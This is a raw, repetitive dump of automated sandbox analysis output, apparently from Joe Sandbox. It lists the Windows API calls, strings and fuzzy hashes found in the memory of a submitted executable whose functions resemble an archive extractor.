                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002EA3DA
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002EA3E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        APIs
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002F2BAA
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 002F2BB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                        • String ID:
                                        • API String ID: 1660781231-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D8289
                                          • Part of subcall function 002D13DC: __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog$CloseFind
                                        • String ID:
                                        • API String ID: 2506663941-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002D5E37: __EH_prolog.LIBCMT ref: 002D5E3C
                                          • Part of subcall function 002DCE40: __EH_prolog.LIBCMT ref: 002DCE45
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D13E1
                                          • Part of subcall function 002D5E37: __EH_prolog.LIBCMT ref: 002D5E3C
                                          • Part of subcall function 002DCE40: __EH_prolog.LIBCMT ref: 002DCE45
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EB098
                                          • Part of subcall function 002D13DC: __EH_prolog.LIBCMT ref: 002D13E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002FACF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                          • Part of subcall function 002FB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002FB177
                                        • _free.LIBCMT ref: 002FC4E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002FB177
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 002F3C3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D5AC2
                                          • Part of subcall function 002DB505: __EH_prolog.LIBCMT ref: 002DB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                          • Part of subcall function 002DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6C4
                                          • Part of subcall function 002DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6F2
                                          • Part of subcall function 002DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6FE
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 002DA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorLast
                                        • String ID:
                                        • API String ID: 1464966427-0
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 002E0E3D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 002EA62C
                                          • Part of subcall function 002EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002EA3DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,002E1B3E), ref: 002EDD92
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        APIs
                                        • DloadProtectSection.DELAYIMP ref: 002EE5E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DloadProtectSection
                                        • String ID:
                                        • API String ID: 2203082970-0
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,002D97BE), ref: 002D98C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE3FC
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,002D903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 002D9F0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,002EAE72,C:\Users\user\Desktop,00000000,0031946A,00000006), ref: 002EAC08
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        APIs
                                        • CloseHandle.KERNELBASE(000000FF,?,?,002D95D6,?,?,?,?,?,00302641,000000FF), ref: 002D963B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002EC2B1
                                        • EndDialog.USER32(?,00000006), ref: 002EC2C4
                                        • GetDlgItem.USER32(?,0000006C), ref: 002EC2E0
                                        • SetFocus.USER32(00000000), ref: 002EC2E7
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 002EC321
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002EC358
                                        • FindFirstFileW.KERNEL32(?,?), ref: 002EC36E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002EC38C
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002EC39C
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002EC3B8
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002EC3D4
                                        • _swprintf.LIBCMT ref: 002EC404
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 002EC417
                                        • FindClose.KERNEL32(00000000), ref: 002EC41E
                                        • _swprintf.LIBCMT ref: 002EC477
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 002EC48A
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002EC4A7
                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002EC4C7
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002EC4D7
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002EC4F1
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002EC509
                                        • _swprintf.LIBCMT ref: 002EC535
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 002EC548
                                        • _swprintf.LIBCMT ref: 002EC59C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 002EC5AF
                                          • Part of subcall function 002EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002EAF35
                                          • Part of subcall function 002EAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0030E72C,?,?), ref: 002EAF84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                        • String ID: %s %s$%s %s %s$P.$REPLACEFILEDLG
                                        • API String ID: 797121971-532198066
                                        • Opcode ID: 8cfebe6439be5302724e0afa1af1ac113ab5e63f225bc179b3553db4176e7465
                                        • Instruction ID: 7f450ed15d421b2898532ee37dbec6f7bdde9841c2038c61fe61f019469f3d7d
                                        • Opcode Fuzzy Hash: 8cfebe6439be5302724e0afa1af1ac113ab5e63f225bc179b3553db4176e7465
                                        • Instruction Fuzzy Hash: BE91F772598384BBD222EBE1CC89FFB77ACEB49700F40481AF745D2080D771EA158B62
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D6FAA
                                        • _wcslen.LIBCMT ref: 002D7013
                                        • _wcslen.LIBCMT ref: 002D7084
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                          • Part of subcall function 002DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641,000000FF), ref: 002DA1F1
                                          • Part of subcall function 002DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641), ref: 002DA21F
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 002D7139
                                        • CloseHandle.KERNEL32(00000000), ref: 002D7155
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 002D7298
                                          • Part of subcall function 002D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002D73BC,?,?,?,00000000), ref: 002D9DBC
                                          • Part of subcall function 002D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 002D9E70
                                          • Part of subcall function 002D9620: CloseHandle.KERNELBASE(000000FF,?,?,002D95D6,?,?,?,?,?,00302641,000000FF), ref: 002D963B
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Strings
                                        Similarity
                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3983180755-3508440684
                                        • Opcode ID: ff00c4c7444e5409725d813ed4ca34aa20c610a84652464f7e1a9d35eff6a0f6
                                        • Instruction ID: 7b4e23095c77ae8fe1d4f7302adf5ecc390a1c6dac381011796858e842964979
                                        • Opcode Fuzzy Hash: ff00c4c7444e5409725d813ed4ca34aa20c610a84652464f7e1a9d35eff6a0f6
                                        • Instruction Fuzzy Hash: 5AC1C571924645AADB25DF74CC45FEEB3ACAF08300F00455BFA56A3382E774AE648F61
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 4593c5c3ec663c81582dfa032e8fe5c3c0c32071fb98fe627dc14424141a349a
                                        • Instruction ID: 071d17b458a6c9dce2da09aa068647159413eec9cba709e56dc7f300c27db276
                                        • Opcode Fuzzy Hash: 4593c5c3ec663c81582dfa032e8fe5c3c0c32071fb98fe627dc14424141a349a
                                        • Instruction Fuzzy Hash: 58C24871E2422D8BDF26CE28DD407EAB3B9EB44384F1541EAD94DE7250E774AE918F40
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: H_prolog_swprintf
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 146138363-3282847064
                                        • Opcode ID: 6f5b16627e5b71bf5e688858520c8cef9d26e855043560aba2184771c742c347
                                        • Instruction ID: b247c1b96f5227cc12adc61ffb280a2877e53cd59a88a0c4f016c67cb7da1509
                                        • Opcode Fuzzy Hash: 6f5b16627e5b71bf5e688858520c8cef9d26e855043560aba2184771c742c347
                                        • Instruction Fuzzy Hash: 3D32E271524285AFDB14DF74C895AEA3BA5AF15300F08047FFD8A8B382DB749E59CB21
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D2874
                                        • _strlen.LIBCMT ref: 002D2E3F
                                          • Part of subcall function 002E02BA: __EH_prolog.LIBCMT ref: 002E02BF
                                          • Part of subcall function 002E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002DBAE9,00000000,?,?,?,00010456), ref: 002E1BA0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D2F91
                                        Strings
                                        Similarity
                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1206968400-2756464174
                                        • Opcode ID: 57c54e48ed3371ad7c42d9b648b2618b1608dea83d7862b01869aa756e4cece3
                                        • Instruction ID: eda8157b7fdb1d3416f6069f0dab32240fae52943d3e3866dfb9df9e841850e5
                                        • Opcode Fuzzy Hash: 57c54e48ed3371ad7c42d9b648b2618b1608dea83d7862b01869aa756e4cece3
                                        • Instruction Fuzzy Hash: EE621471520246CFDB19CF34C8956EA3BA1AF64300F18447FED9A8B382D7759D69CB60
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002EF844
                                        • IsDebuggerPresent.KERNEL32 ref: 002EF910
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002EF930
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 002EF93A
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 35b12b6907bb473a94e44190a0e89adb6a978b9b3e5dc2aa9c59d53d5ed57b34
                                        • Instruction ID: c8996447c5c9002de237d526386ec9a2ba68279c98cabb79369d3ceb8e71fc61
                                        • Opcode Fuzzy Hash: 35b12b6907bb473a94e44190a0e89adb6a978b9b3e5dc2aa9c59d53d5ed57b34
                                        • Instruction Fuzzy Hash: 69312975D552199BDB61EFA5D9897CCBBB8AF08304F5040AAE40CAB250EB719B848F44
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,002EE5E8,0000001C,002EE7DD,00000000,?,?,?,?,?,?,?,002EE5E8,00000004,00331CEC,002EE86D), ref: 002EE6B4
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,002EE5E8,00000004,00331CEC,002EE86D), ref: 002EE6CF
                                        Strings
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 8695cc0feb4fd576d5a756dfa9ad3213ab8429f2dadb4ec49a380ac67e63df24
                                        • Instruction ID: 51c815111dea7fe20485533e88c43a97e25b5d028af0dab8bb93e00443201fc3
                                        • Opcode Fuzzy Hash: 8695cc0feb4fd576d5a756dfa9ad3213ab8429f2dadb4ec49a380ac67e63df24
                                        • Instruction Fuzzy Hash: 7D012B326501496BDF14DE29DC09BDE7BAEEFC4324F0DC121ED19D7154D634D9158680
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002F8FB5
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002F8FBF
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 002F8FCC
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
